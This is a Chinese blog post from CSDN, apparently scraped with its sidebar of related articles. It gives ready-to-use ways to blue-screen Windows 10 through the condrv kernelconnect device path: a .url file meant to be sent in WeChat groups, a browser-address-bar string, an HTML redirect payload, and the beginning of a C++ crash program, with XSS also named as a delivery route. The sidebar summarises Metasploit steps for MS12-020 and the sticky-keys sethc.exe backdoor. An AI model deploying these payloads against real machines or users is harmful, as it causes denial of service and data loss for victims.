Windows蓝屏漏洞(利用多种途径与分析)

最新推荐文章于 2024-07-25 20:38:24 发布
最新推荐文章于 2024-07-25 20:38:24 发布
阅读量1k 收藏 1
点赞数
分类专栏: 漏洞复现与分析 文章标签: 安全漏洞 安全 渗透测试 bug
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Vdieoo/article/details/113499389
版权
本文介绍了Windows的一个蓝屏漏洞,可通过制作URL文件、直接浏览器访问、HTML注入及EXE程序等方式触发。该漏洞源于对Win32设备命名空间路径的误用,可能导致系统服务异常并引发蓝屏死机。研究人员发现该问题存在于Windows 10 1709及更高版本,并已向微软报告,微软承诺将提供更新修复。
摘要由CSDN通过智能技术生成

可使用途径:微信制作.url文件或其他文件,地址栏直接访问,做成html,exe等文件,xss利用等

url文件制作:https://baijiahao.baidu.com/s?id=1553137529313837&wfr=spider&for=pc

url文件内核心代码为:file:///globalroot/device/condrv/kernelconnect

通过微信等软件直接发群里.url的文件可直接触发访问(微信已修复)

直接浏览器地址栏(除ie浏览器)访问:\\.\globalroot\device\condrv\kernelconnect

html代码文件

<html><head></head><body>><script>document.location = '\\\\.\\globalroot\\device\\condrv\\kernelconnect';</script></body></html>

exe代码文件

// BSOD.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。// #include <iostream>#include <Windows.h> int main(){    WCHAR fileName[] = L"\\\\.\\globalroot\\device\\condrv\\ker

最低0.47元/天 解锁文章
Vdieoo
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MS12-020漏洞利用||蓝屏攻击
weixin_51909453的博客
11-23 4664
MS12-020漏洞利用蓝屏攻击 两台靶机:kali、win2003 被攻击者win2003 ip:192. 168.179.132 原理:利用操作系统内核的缺陷,发送大量数据包,则这个漏洞可能造成拒绝服务攻击或允许远程执行代码 前提:对方开启3389端口 1、两者都在同一内网,采用NAT连接方式。开启win2003开启远程桌面 2、扫描目标机,发现开放了3389,可以继续下一步操作了 nmap -sV /nmap -sT 都可以扫描 3、开始渗透 渗透测试系统中,在终端输入msfconsole
win10蓝屏漏洞
Vdieoo的博客
01-28 1378
Windows 10 错误在您访问此位置时使电脑崩溃 Windows 10 中的 Bug 只需在浏览器的地址栏中打开某个路径或使用其他 Windows 命令,即可导致操作系统崩溃与死亡蓝屏。 上周,BleepingComputer 了解到 Windows 安全研究人员在 Twitter 上披露的两个错误,这些错误可能会在各种攻击中被攻击者滥用。 第一个错误允许非特权用户或程序输入单个命令,导致 NTFS 卷被标记为已损坏。虽然 chkdsk 在许多测试中解决了此问题,但我们的一个测试表明,该命令导
win7四大基础漏洞复现(死亡蓝屏,构造payload,永恒之蓝shift5),以及修复方案
xt350488的博客
06-20 1316
简单理解,用来生成后门的软件。当用户连续按下5次Shift键时,正常情况下,系统会启动一个名为“粘滞键”(Sticky Keys)的辅助功能,其对应的程序是sethc.exe,位于C:\Windows\System32\目录下。然而,在某些未打补丁的Windows 7(SP1)系统上,攻击者可以通过替换或修改sethc.exe文件,使其指向其他程序,如命令提示符(cmd.exe)。一旦sethc.exe被替换,当用户再次连续按下5次Shift键时,就会启动命令提示符,而不是粘滞键。
MS12-020漏洞利用(死亡蓝屏
白帽小学二年级的博客
12-22 3203
MS12-020漏洞利用(死亡蓝屏) 攻击方:kali-Linux 目标机:Windows7 专业版 平台:VMware虚拟机
vmware 蓝屏_网络安全小百科--利用微软CVE 2019-0708漏洞让对方系统蓝屏死机
weixin_39760967的博客
11-27 270
漏洞背景:Windows 系列服务器于 2019 年 5 月 15 号,被爆出高危漏洞,该服务器漏洞利用方式是通过远程桌面端口3389进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的永恒之蓝病毒差不多。2019年9月7日晚上凌晨 1 点左右,metaspolit 官方更新了漏洞利用程序。漏洞危害:CVE-2019-0708 漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互...
Windows操作系统蓝屏代码分析指导书.docx
07-27
本文档提供了Windows操作系统蓝屏代码分析的指导书,涵盖了多种蓝屏错误代码的分析和解决方法。蓝屏错误代码是一种常见的Windows操作系统错误,可能是由硬件、驱动程序、软件或系统配置引起的。本文档将对常见的蓝屏...
windows蓝屏代码分析软件.zip
06-25
Windows系统的蓝屏通常是由于发生了严重错误,其原因通常是安装了不正确的驱动等。这款名为BlueScreenView(电脑蓝屏信息)的免费小软件能够分解出Windows发生蓝屏崩溃后生成的“minidump”文件,使其容易阅读,从而...
Win2008 蓝屏漏洞揭秘
01-10
 蓝屏漏洞威胁的是服务器操作系统Windows Server 2008,这意味着如果Windows Server 2008蓝屏,将导致服务器停止服务……目前,漏洞利用代码还限制在小范围内,不过漏洞攻击工具却已经研制出来了,现在为大家揭秘...
Windows蓝屏错误代码蓝屏案实例分析和破解大全.doc
11-19
"Windows 蓝屏错误代码分析和破解大全" 本资源摘要信息是关于 Windows 蓝屏错误代码的分析和破解大全。蓝屏错误代码是 Windows 操作系统中的一个常见问题,当系统出现蓝屏错误代码时,用户通常只能重启电脑,但这并...
windows蓝屏分析诊断工具V2.52.2264213.zip
06-05
总的来说,Windows蓝屏分析诊断工具通过自动化和智能化的方式,为用户提供了一种高效、便捷的排查蓝屏问题的途径,减少了因系统错误带来的困扰。用户只需运行压缩包内的"蓝屏分析诊断工具V2.52.2264213.exe"文件,...
漏洞复现】MS12-020漏洞蓝屏攻击)复现
m0_53223419的博客
01-27 1340
使用windows虚拟机、linux虚拟机复现MS12-020漏洞
系统漏洞攻击之蓝屏警告
qq_46258964的博客
06-30 1878
利用系统在带的漏洞实施攻击 实验工具 1,kali一台 2,Windows 2003 一台 3,nmap 端口扫描工具 4,msfconsole 攻击框架 5,ms12-020 系统漏洞 实验环境 Windows2003,打开高危端口,关闭防火墙。 kali进行攻击 操作步骤 1,扫描端口开放情况 nmap -sP 192.168.3.1-255 nmap -sS 192.168.3.16 2,打开攻击框架 msfconsole 3, msf > search dos //查看KALI漏
CVE2012-0002(ms12-020)蓝屏漏洞利用
2302_81096429的博客
05-09 832
ms12-020(漏洞全称:Microsoft Windows 远程桌面协议远程代码执行漏洞漏洞是一个远程代码执行漏洞。输入use 0使用漏洞扫描模块,进入后使用show options查看可使用选项设置rhosts为靶机ip。0 auxiliary/scanner/rdp/ms12_020_check是漏洞扫描模块。back返回用use 1使用攻击载荷模块,剩下操作与漏洞扫描模块一样,run执行。设置rhosts为靶机ip,设置完成后run执行,执行后显示漏洞利用。3.搜索ms12-020漏洞
ms12-020(蓝屏攻击漏洞复现)
Martin-share的博客
02-11 4770
ms12-020(蓝屏攻击漏洞复现)
3389蓝屏重启漏洞及工具
Koma的主页
03-17 3663
MS12-020漏洞检测工具 该漏洞可导致服务器重启或蓝屏,自XP至2003、2008、Win7均逃脱不过。 希望广大友友打上该补丁吧! 补丁地址:http://technet.microsoft.com/zh-cn/security/bulletin/ms12-020 漏洞挖掘:http://bbs.pediy.com/showthread.php?t=148003
ms12_020漏洞蓝屏
xyx107的博客
03-03 703
1、准备:攻击机kali,靶机winxpen sp32、打开metasploit3、查找ms12_020:search ms12_0204、使用第一个:use auxiliary/dos/windows/rdp/ms12_020_maxchannelids5、查看:show options6、设置目标主机IP:setRHOST192.168.199.143(靶机IP) 打开靶机3389端口...
MS12-020(死亡蓝屏漏洞复现及防范措施
最新发布
qq_57538478的博客
07-25 393
漏洞名:MS12-020(全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞)MS12-020是一个针对远程桌面(RDP)协议的漏洞,其最严重的情况可能会造成远程执行代码,而通常情况下会造成对方蓝屏
第7篇:MS12-020蓝屏漏洞在实战中的巧用
ABC_123的博客
04-30 2652
Part1 前言大家好,上期分享了一篇Shiro Oracle Padding反序列化漏洞无key的实战文章,这期讲一个MS12-020蓝屏漏洞的真实利用过程。这个案例源于2013年我在读研期间,印象是比较深的。在学校期间,我偶尔会帮网络部那边处理一些网站故障,还帮忙修补过安全漏洞。在那个年代,大学网站的漏洞是非常多的,基本上没有什么WAF设备防护。期间有一个大学网站.........
深入解析Windows蓝屏日志:原因与分析方法
"蓝屏日志分析,详细分析过程" 在深入探讨蓝屏日志分析之前,首先要理解蓝屏的基本概念。"蓝屏"(Blue Screen of Death,简称BSOD)是Windows操作系统在遇到严重系统错误时显示的一种错误界面,通常伴随着详细的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值